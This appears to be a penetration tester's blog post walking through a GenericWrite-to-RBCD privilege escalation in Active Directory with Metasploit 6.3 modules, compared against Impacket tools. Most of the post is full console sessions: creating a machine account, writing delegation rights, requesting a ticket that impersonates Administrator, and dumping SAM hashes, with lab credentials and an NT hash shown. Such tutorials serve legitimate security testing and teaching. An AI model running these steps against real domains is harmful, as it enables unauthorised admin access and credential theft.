Metasploit recently released version 6.3. With it came a whole lot of new features related to LDAP operations and using Kerberos authentication.
In this blog I want to demonstrate how to perform a GenericWrite -> RBCD attack, which I find are very common. Often times a user will not have administrative access to a computer, but will have GenericWrite privileges or equivalent (GenericAll,Owns,etc), over a computer. By exploiting this configuration it is possible to gain admin access on the computer. There are two main ways to perform this attack currently, either by using a combination of Rubeus/Powermad/Powerview, or by using various scripts within Impacket.
To explain some of the new features, I will compare the modules within Metasploit to their Impacket counterparts.
First, to perform this attack you will need a computer account. If you do not have one under your control already, you will need to create one. In Impacket we would use addcomputer.py, but here we will use auxiliary/admin/dcerpc/samr_computer.
msf6 auxiliary(admin/dcerpc/samr_computer)> show options Module options (auxiliary/admin/dcerpc/samr_computer): Name Current Setting Required Description ---- --------------- -------- ----------- COMPUTER_NAME no The computer name RHOSTS 172.16.73.6 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 445 yes The target port (TCP) SMBDomain n00py.local no The Windows domain to use for authentication SMBPass Password1 no The password for the specified username SMBUser n00py no The username to authenticate as When ACTION is ADD_COMPUTER: Name Current Setting Required Description ---- --------------- -------- ----------- COMPUTER_PASSWORD no The password for the new computer Auxiliary action: Name Description ---- ----------- ADD_COMPUTER Add a computer account View the full module info with the info, or info -d command. msf6 auxiliary(admin/dcerpc/samr_computer) > run [*] Running module against 172.16.73.6 [+] 172.16.73.6:445 - Successfully created n00py.local\DESKTOP-MKFA61G6$ [+] 172.16.73.6:445 - Password: 7TH6BPcPqXo5OLTIy3XJbwS77d3VPhyj [+] 172.16.73.6:445 - SID: S-1-5-21-3387312503-3460017432-368973690-1135 [*] Auxiliary module execution completed
Once you have obtained a new computer account, we then have to configure delegation rights on the victim computer. With Impacket we would use rbcd.py, but here we will use auxiliary/admin/ldap/rbcd.
msf6 auxiliary(admin/ldap/rbcd) > show options Module options (auxiliary/admin/ldap/rbcd): Name Current Setting Required Description ---- --------------- -------- ----------- DELEGATE_FROM DESKTOP-MKFA61G6$ no The delegation source DELEGATE_TO WIN-27M967MQJL4$ yes The delegation target DOMAIN n00py.local no The domain to authenticate to PASSWORD Password1 no The password to authenticate with RHOSTS 172.16.73.6 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 389 yes The target port SSL false no Enable SSL on the LDAP connection USERNAME n00py no The username to authenticate with View the full module info with the info, or info -d command. msf6 auxiliary(admin/ldap/rbcd) > read [*] Running module against 172.16.73.6 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [*] 172.16.73.6:389 Getting root DSE [+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local [*] The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty. [*] Auxiliary module execution completed msf6 auxiliary(admin/ldap/rbcd) > write [*] Running module against 172.16.73.6 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [*] 172.16.73.6:389 Getting root DSE [+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local [+] Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. [*] Added account: [*] S-1-5-21-3387312503-3460017432-368973690-1135 (DESKTOP-MKFA61G6$) [*] Auxiliary module execution completed msf6 auxiliary(admin/ldap/rbcd) > read [*] Running module against 172.16.73.6 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [*] 172.16.73.6:389 Getting root DSE [+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local [*] Allowed accounts: [*] S-1-5-21-3387312503-3460017432-368973690-1135 (DESKTOP-MKFA61G6$) [*] Auxiliary module execution completed
Once we have configured delegation, we can then request a service ticket for any user. With Impacket we would use getST.py, but here we will use auxiliary/admin/kerberos/get_ticket. We will want to use the final service ticket saved by Metasploit.
msf6 auxiliary(admin/kerberos/get_ticket) > show options Module options (auxiliary/admin/kerberos/get_ticket): Name Current Setting Required Description ---- --------------- -------- ----------- AES_KEY no The AES key to use for Kerberos authentication in hex string. Supported keys: 128 or 256 bits CERT_FILE no The PKCS12 (.pfx) certificate file to authenticate with CERT_PASSWORD no The certificate file's password DOMAIN n00py.local no The Fully Qualified Domain Name (FQDN). Ex: mydomain.local NTHASH no The NT hash in hex string. Server must support RC4 PASSWORD 7TH6BPcPqXo5OLTIy3XJbwS77d3VPhyj no The domain user's password RHOSTS 172.16.73.6 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 88 yes The target port Timeout 10 yes The TCP timeout to establish Kerberos connection and read data USERNAME DESKTOP-MKFA61G6$ no The domain user When ACTION is GET_TGS: Name Current Setting Required Description ---- --------------- -------- ----------- IMPERSONATE Administrator no The user on whose behalf a TGS is requested (it will use S4U2Self/S4U2Proxy to request the ticket) SPN CIFS/WIN-27M967MQJL4.n00py.local no The Service Principal Name, format is service_name/FQDN. Ex: cifs/dc01.mydomain.local Auxiliary action: Name Description ---- ----------- GET_TGS Request a Ticket-Granting-Service (TGS) View the full module info with the info, or info -d command. msf6 auxiliary(admin/kerberos/get_ticket) > set verbose true verbose => true msf6 auxiliary(admin/kerberos/get_ticket) > run [*] Running module against 172.16.73.6 [+] 172.16.73.6:88 - Received a valid TGT-Response [*] 172.16.73.6:88 - TGT MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_994901.bin [*] 172.16.73.6:88 - Getting TGS impersonating Administrator@n00py.local (SPN: CIFS/WIN-27M967MQJL4.n00py.local) [+] 172.16.73.6:88 - Received a valid TGS-Response [*] 172.16.73.6:88 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_606526.bin [+] 172.16.73.6:88 - Received a valid TGS-Response [*] 172.16.73.6:88 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_662784.bin [*] Auxiliary module execution completed
Finally, once we have this ticket we can then perform admin actions on the target. Typically a pentester would use Impacket’s secretsdump.py or CrackMapExec (which is the same thing under the hood), to recover credentials off of the system. We can use Metasploit’s auxiliary/gather/windows_secrets_dump module to do this instead, and is the equivalent to running both –sam and –lsa in CrackMapExec. The only tricky part here is making it work with Kerberos authentication which requires going into the advanced options.
msf6 auxiliary(gather/windows_secrets_dump) > show options Module options (auxiliary/gather/windows_secrets_dump): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 172.16.73.12 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 445 yes The target port (TCP) SMBDomain n00py.local no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser Administrator no The username to authenticate as Auxiliary action: Name Description ---- ----------- ALL Dump everything View the full module info with the info, or info -d command. msf6 auxiliary(gather/windows_secrets_dump) > show advanced Module advanced options (auxiliary/gather/windows_secrets_dump): Name Current Setting Required Description ---- --------------- -------- ----------- [TRUNCATED] SMB::Auth kerberos yes The Authentication mechanism to use (Accepted: auto, ntlm, kerberos) [TRUNCATED] Active when SMB::Auth is kerberos: Name Current Setting Required Description ---- --------------- -------- ----------- DomainControllerRhost WIN-NDA9607EHKS.n00py.local no The resolvable rhost for the Domain Controller KrbCacheMode read-write yes Kerberos ticket cache storage mode (Accepted: none, read-only, write-only, read-write) SMB::Krb5Ccname /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_662784.bin no The ccache file to use for kerberos authentication SMB::KrbOfferedEncryptionTypes AES256,AES128,RC4-HMAC,DES-CBC-MD5,DES3-CBC-SHA1 yes Kerberos encryption types to offer SMB::Rhostname WIN-27M967MQJL4.n00py.local no The rhostname which is required for kerberos - the SPN View the full module info with the info, or info -d command. msf6 auxiliary(gather/windows_secrets_dump) > run [*] Running module against 172.16.73.12 [*] 172.16.73.12:445 - Opening Service Control Manager [*] 172.16.73.12:445 - Binding to \svcctl... [+] 172.16.73.12:445 - Bound to \svcctl [*] 172.16.73.12:445 - Service RemoteRegistry is in stopped state [*] 172.16.73.12:445 - Starting service... [*] 172.16.73.12:445 - Retrieving target system bootKey [*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\JD [*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\Skew1 [*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\GBG [*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\Data [+] 172.16.73.12:445 - bootKey: 0x1a9c42b4c664bb5ab1c699858559fc76 [*] 172.16.73.12:445 - Checking NoLMHash policy [*] 172.16.73.12:445 - LMHashes are not being stored [*] 172.16.73.12:445 - Saving remote SAM database [*] 172.16.73.12:445 - Create SAM key [*] 172.16.73.12:445 - Save key to PUnE0CMU.tmp [*] 172.16.73.12:445 - Dumping SAM hashes [*] 172.16.73.12:445 - Calculating HashedBootKey from SAM [*] 172.16.73.12:445 - Password hints: No users with password hints on this system [*] 172.16.73.12:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::): Administrator:500:aad3b435b51404eeaad3b435b51404ee:b0abb98152c261c4c23429ed9eecc117::: [TRUNCATED] [*] Auxiliary module execution completed
Sweet, creds! This just a lab system, but were it a live target we would likely find quite a few juicy credentials we could re-use elsewhere. There are of course a lot more post-exploitation options you could perform with Metasploit, but the goal here is just to demonstrate how to use modules with a service ticket and Kerberos authentication.
Will this replace Impacket for me? Not likely, but I’m always a fan of having more tools in my toolbox.
